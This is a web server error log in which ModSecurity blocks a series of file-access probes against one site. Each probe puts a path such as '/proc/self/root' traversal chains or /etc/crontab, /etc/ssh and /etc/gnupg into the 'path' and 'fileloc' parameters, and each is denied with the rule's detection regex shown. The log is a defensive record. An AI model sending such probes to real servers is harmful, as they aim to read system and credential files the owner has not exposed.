[Thu Mar 19 16:04:28.880889 2026] [:error] [pid 21563:tid 140411548894976] [client 74.7.243.128:40608] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abxIvEpm7ZmxKZTM4bZpKwAAA5c"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 16:04:30.718532 2026] [:error] [pid 26799:tid 140411624429312] [client 57.141.18.101:57206] [client 57.141.18.101] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/rpc"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/condolatory/persuadedness012971570240.phtml"] [unique_id "abxIvta6ubjKNq_cu4Z6nQAAA04"]
[Thu Mar 19 16:04:31.383618 2026] [:error] [pid 21219:tid 140411607643904] [client 74.7.243.128:47808] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abxIv_XLqtnMIWvjpaJC9QAAApA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 16:04:32.051757 2026] [:error] [pid 15826:tid 140411716749056] [client 57.141.18.44:57276] [client 57.141.18.44] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/condolatory/persuadedness012971570240.phtml"] [unique_id "abxIwOoXxyEfFpUF8f8xLgAAAUM"]
[Thu Mar 19 16:04:32.407893 2026] [:error] [pid 19655:tid 140411733534464] [client 57.141.18.2:57210] [client 57.141.18.2] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/crontab"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/condolatory/persuadedness012971570240.phtml"] [unique_id "abxIwE1ujooLWdUDGy75lAAAAEE"]
[Thu Mar 19 16:04:34.615427 2026] [:error] [pid 21563:tid 140411548894976] [client 57.141.18.66:57368] [client 57.141.18.66] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/bash_completion.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/condolatory/persuadedness012971570240.phtml"] [unique_id "abxIwkpm7ZmxKZTM4bZpLwAAA5c"]
[Thu Mar 19 16:04:35.013396 2026] [:error] [pid 7893:tid 140411632822016] [client 74.7.243.128:47816] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abxIwxCii7xarUs8iHYOzAAAAg0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 16:04:36.129804 2026] [proxy_fcgi:error] [pid 7235:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:53922] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 16:04:38.092358 2026] [:error] [pid 30077:tid 140411632822016] [client 74.7.243.128:47824] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abxIxvu8EFLIOrSqIpvN7QAAAk0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 16:04:38.828690 2026] [:error] [pid 5816:tid 140411649607424] [client 57.141.18.12:57502] [client 57.141.18.12] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/grep_colors"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/condolatory/persuadedness012971570240.phtml"] [unique_id "abxIxpfmNfuxceSuAEK5_QAAAcs"]
[Thu Mar 19 16:04:39.036922 2026] [:error] [pid 7893:tid 140411725141760] [client 57.141.18.38:57508] [client 57.141.18.38] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/condolatory/persuadedness012971570240.phtml"] [unique_id "abxIxxCii7xarUs8iHYO0wAAAgI"]
[Thu Mar 19 16:04:41.358749 2026] [:error] [pid 7893:tid 140411666392832] [client 74.7.243.128:33028] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/dnsmasq.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abxIyRCii7xarUs8iHYO2AAAAgk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 16:04:42.248214 2026] [:error] [pid 15826:tid 140411716749056] [client 57.141.18.115:57616] [client 57.141.18.115] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/condolatory/persuadedness012971570240.phtml"] [unique_id "abxIyuoXxyEfFpUF8f8xNQAAAUM"]
[Thu Mar 19 16:04:42.979187 2026] [:error] [pid 21219:tid 140411716749056] [client 57.141.18.104:57634] [client 57.141.18.104] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/condolatory/persuadedness012971570240.phtml"] [unique_id "abxIyvXLqtnMIWvjpaJC_QAAAoM"]
[Thu Mar 19 16:04:43.277496 2026] [:error] [pid 19655:tid 140411733534464] [client 57.141.18.113:57646] [client 57.141.18.113] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/mime.types"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/condolatory/persuadedness012971570240.phtml"] [unique_id "abxIy01ujooLWdUDGy75ngAAAEE"]
[Thu Mar 19 16:04:43.943428 2026] [:error] [pid 19655:tid 140411708356352] [client 57.141.18.4:57666] [client 57.141.18.4] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/chrony.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/condolatory/persuadedness012971570240.phtml"] [unique_id "abxIy01ujooLWdUDGy75nwAAAEQ"]
[Thu Mar 19 16:04:44.470988 2026] [:error] [pid 30077:tid 140411632822016] [client 74.7.243.128:33040] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/xinetd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abxIzPu8EFLIOrSqIpvN7wAAAk0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 16:04:45.350231 2026] [:error] [pid 8307:tid 140411624429312] [client 57.141.18.103:57714] [client 57.141.18.103] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/adjtime"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/condolatory/persuadedness012971570240.phtml"] [unique_id "abxIzb-FhjpZGs9ba8qPNwAAAw4"]
[Thu Mar 19 16:04:45.468727 2026] [:error] [pid 8307:tid 140411733534464] [client 57.141.18.102:57722] [client 57.141.18.102] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/xinetd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/condolatory/persuadedness012971570240.phtml"] [unique_id "abxIzb-FhjpZGs9ba8qPOAAAAwE"]
[Thu Mar 19 16:04:47.113458 2026] [:error] [pid 5816:tid 140411725141760] [client 74.7.243.128:33042] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abxIz5fmNfuxceSuAEK6AwAAAcI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 16:04:47.415851 2026] [:error] [pid 5816:tid 140411641214720] [client 57.141.18.91:57792] [client 57.141.18.91] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/condolatory/persuadedness012971570240.phtml"] [unique_id "abxIz5fmNfuxceSuAEK6BQAAAcw"]
[Thu Mar 19 16:04:47.711588 2026] [:error] [pid 30077:tid 140411632822016] [client 57.141.18.112:57804] [client 57.141.18.112] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/profile.rpmnew"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/condolatory/persuadedness012971570240.phtml"] [unique_id "abxIz_u8EFLIOrSqIpvN8QAAAk0"]
[Thu Mar 19 16:04:49.729181 2026] [:error] [pid 21563:tid 140411557287680] [client 57.141.18.84:57862] [client 57.141.18.84] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/filesystems"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/condolatory/persuadedness012971570240.phtml"] [unique_id "abxI0Upm7ZmxKZTM4bZpNQAAA5Y"]
[Thu Mar 19 16:04:51.152949 2026] [:error] [pid 19655:tid 140411632822016] [client 57.141.18.109:57906] [client 57.141.18.109] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/system-release-cpe"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/condolatory/persuadedness012971570240.phtml"] [unique_id "abxI001ujooLWdUDGy75ogAAAE0"]
[Thu Mar 19 16:04:51.376793 2026] [:error] [pid 27293:tid 140411540502272] [client 57.141.18.123:57914] [client 57.141.18.123] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/locale.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/condolatory/persuadedness012971570240.phtml"] [unique_id "abxI0_-YZRR_7pZ7nDKvhQAAA9g"]
[Thu Mar 19 16:04:51.678657 2026] [:error] [pid 21563:tid 140411548894976] [client 57.141.18.99:57920] [client 57.141.18.99] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/makedumpfile.conf.sample"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/condolatory/persuadedness012971570240.phtml"] [unique_id "abxI00pm7ZmxKZTM4bZpNgAAA5c"]
[Thu Mar 19 16:04:52.319202 2026] [:error] [pid 17887:tid 140411674785536] [client 57.141.18.12:57944] [client 57.141.18.12] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/condolatory/persuadedness012971570240.phtml"] [unique_id "abxI1AkwaGbbGflqUZDv5QAAAMg"]
